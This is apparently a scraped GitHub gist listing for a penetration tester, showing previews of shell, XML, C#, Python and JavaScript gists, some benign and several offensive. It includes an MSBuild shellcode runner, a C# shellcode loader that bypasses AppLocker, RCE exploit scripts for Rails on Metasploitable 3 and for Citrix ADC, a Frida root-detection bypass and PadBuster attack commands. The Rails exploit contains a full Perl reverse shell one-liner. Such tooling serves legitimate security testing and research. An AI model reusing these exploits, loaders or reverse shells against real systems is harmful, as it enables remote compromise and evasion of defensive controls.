LongCat pich4ya

pich4ya / fix_virtualenv
Created May 16, 2020 — forked from tevino/fix_virtualenv
Fix python virtualenv after python update
#!/usr/bin/env bash
ENV_PATH="$(dirname "$(dirname "$(which pip)")")"
SYSTEM_VIRTUALENV="$(which -a virtualenv|tail -1)"
echo "Ensure the root of the broken virtualenv:"
echo " $ENV_PATH"
pich4ya / magisk_pixel3a.txt
Last active May 16, 2020
Clean Flash Magisk on Pixel 3a (Android 9)
@author LongCat (Pichaya Morimoto)
1. Enable ADB
Settings > About Phone > Tap on the "Build Number" entry 7 times
Settings > System > Advanced > Developer options > Enable "USB debugging"
Settings > System > Advanced > Developer options > Enable "OEM unlocking"
Note: If you cannot enable "OEM unlocking", then you are out of luck - Buy the new one :)
Connect Pixel 3a to MBP > allow access in the device's prompt.
pich4ya / shellcode.xml
Created May 1, 2020 — forked from ConsciousHacker/shellcode.xml
MSBuild Shellcode Runner
<Project ToolsVersion="4.0" xmlns="">
<!-- This inline task executes shellcode. -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
<!-- Save This File And Execute The Above Command -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<Target Name="Hello">
<ClassExample />
pich4ya / Shellcode.cs
Created May 1, 2020 — forked from netbiosX/Shellcode.cs
C# file that contains shellcode and bypasses AppLocker via Assembly Load
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
ManageEngine Desktop Central FileStorage getChartImage Deserialization of Untrusted Data Remote Code Execution Vulnerability
File ...: ManageEngine_DesktopCentral_64bit.exe
SHA1 ...: 73ab5bb00f993685c711c0aed450444795d5b826
Found by: mr_me
Date ...: 2019-12-12
CVE ....: CVE-2020-10189
pich4ya /
Last active Feb 8, 2020
Fix broken rails_dynamic_render_code_exec's exploit against Metasploitable 3
# @author Pichaya Morimoto (
# Exploit for Metasploitable 3 - render params[:os] 's RCE
# msf: multi/http/rails_dynamic_render_code_exec is not working due to no ImageMagick
# This exploit slightly adjusts the temporary file extension to an empty string
import requests
# 1. tmp upload
host = ""
cmd = "perl -e 'use Socket;$i=\"\";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'"
pich4ya /
Created Jan 19, 2020 — forked from 0x09AL/
Citrix ADC / NetScaler Remote Command Execution
import requests
import sys
import time
append_value = str(time.time())
print "# By 0x09AL - MDSec ActiveBreach \n"
def upload_file(url,payload):
endpoint = url + "/vpns/portal/scripts/"
pich4ya /
Last active Nov 29, 2019
How to avoid trusting all HTTPS certificates when connecting to an internal API whose API server uses a certificate issued by an internal root CA
- Make sure you already have the root certificate file
- Set $JAVA_HOME to the correct location and make sure the file $JAVA_HOME/jre/lib/security/cacerts exists
- The Java keystore password is changeit by default
1. First, download or request the root certificate you will use
Root certificates contain public information and CAs always make them available for anyone.
$ wget -O ca.pem
pich4ya / root_bypass.js
Created Aug 5, 2019
Bypass Android Root Detection / Bypass RootBeer - August 2019
// $ frida -l antiroot.js -U -f --no-pause
// CHANGELOG by Pichaya Morimoto (
// - I added extra whitelisted items to deal with the latest versions
// of RootBeer/Cordova iRoot as of August 6, 2019
// - The original one just fucked up (kill itself) if Magisk is installed lol
// Credit & Originally written by:
// If this isn't working in the future, check console logs, rootbeer src, or
Java.perform(function() {
var RootPackages = ["", "", "eu.chainfire.supersu",
pich4ya / padbuster_macos2019.txt
Created Aug 5, 2019
Install PadBuster on macOS Mojave 10.14.5
brew install openssl
brew install perl
brew unlink perl && brew link perl
env LDFLAGS="-L$(brew --prefix openssl)/lib" CFLAGS="-I$(brew --prefix openssl)/include" perl -MCPAN -e 'install Crypt::SSLeay'
git clone && cd PadBuster
perl "https://example.local/ScriptResource.axd?d=yyy" yyy 16 -encoding 3 -bruteforce -log -verbose -cookies "ASP.NET_SessionId=xxx"